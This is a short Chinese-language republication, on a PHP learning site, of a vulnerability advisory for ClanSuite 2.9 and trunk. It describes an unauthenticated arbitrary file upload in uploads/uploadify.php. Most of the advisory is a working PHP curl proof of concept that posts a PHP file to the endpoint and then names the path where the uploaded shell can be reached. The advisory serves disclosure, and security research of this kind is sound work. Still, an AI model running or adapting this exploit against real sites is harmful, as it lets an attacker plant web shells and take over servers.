来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 标题: ClanSuite 2.9 Arbitrary File Upload发现者: Adrien Thierry程序开发商http://clansuite.com/下载地址 : https://github.com/jakoch/Clansuite http://svn.gna.org/svn/clansuite/trunk/影响版......
|
标题: ClanSuite 2.9 Arbitrary File Upload
发现者: Adrien Thierry 程序开发商http://clansuite.com/ 下载地址 : https://github.com/jakoch/Clansuite http://svn.gna.org/svn/clansuite/trunk/ 影响版本: 2.9 and Trunk Revision 6400 缺陷地址 : uploads/uploadify.php 测试方法 <?php $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php"; $c = curl_init("http:// www.2cto.com /uploads/uploadify.php"); // Version 2.9 $c = curl_init("http:// www.2cto.com /application/uploads/uploadify.php"); // Version trunk curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, array('Filedata'=>"@$u", 'name'=>"info.php")); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $e = curl_exec($c); curl_close($c); echo $e; ?> shell位置: http://www.2cto.com /uploads/temps/info.php 或者 http://www.2cto.com /application/uploads/temps/info.php |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
